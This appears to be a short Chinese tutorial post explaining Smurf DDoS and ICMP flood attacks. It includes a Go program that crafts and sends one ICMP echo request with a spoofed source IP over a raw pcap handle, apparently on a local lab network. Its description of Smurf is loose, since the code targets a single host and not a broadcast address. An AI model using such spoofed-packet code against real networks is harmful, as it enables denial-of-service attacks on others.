Smurf DDOS

攻擊者發送大量偽造來源地址的ICMP封包，回應請求(ping)到目標主機，主要目的是消耗目標網絡的頻寬和資源，使其無法正常運作。注：ICMP Flood是一種DoS攻擊，不像Smurf攻擊一樣偽造來源IP地址，只是連續地向目標主機發送ICMP消息，通常是ping請求。這將使目標主機的CPU和網絡資源耗盡，導致服務中斷。

Code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53


package main

import (
	"log"
	"net"

	"github.com/google/gopacket"
	"github.com/google/gopacket/layers"
	"github.com/google/gopacket/pcap"
)

func main() {
	handle, err := pcap.OpenLive("bridge100", 1024, false, pcap.BlockForever)
	if err != nil {
		log.Fatal(err)
	}
	defer handle.Close()

	// Ethernet layer
	eth := &layers.Ethernet{
		SrcMAC:       net.HardwareAddr{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
		DstMAC:       net.HardwareAddr{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
		EthernetType: layers.EthernetTypeIPv4,
	}

	ipLayer := &layers.IPv4{
		Version:  4,
		TTL:      64,
		Protocol: layers.IPProtocolICMPv4,
		SrcIP:    net.ParseIP("10.211.55.2"),
		DstIP:    net.ParseIP("10.211.55.10"),
	}

	icmpLayer := &layers.ICMPv4{
		TypeCode: layers.ICMPv4TypeEchoRequest,
	}

	buffer := gopacket.NewSerializeBuffer()
	options := gopacket.SerializeOptions{
		FixLengths:       true,
		ComputeChecksums: true,
	}
	if err := gopacket.SerializeLayers(buffer, options, eth, ipLayer, icmpLayer, gopacket.Payload([]byte("Hello, ICMP!"))); err != nil {
		log.Fatal(err)
	}

	icmpPacket := buffer.Bytes()

	err = handle.WritePacketData(icmpPacket)
	if err != nil {
		log.Fatal(err)
	}
}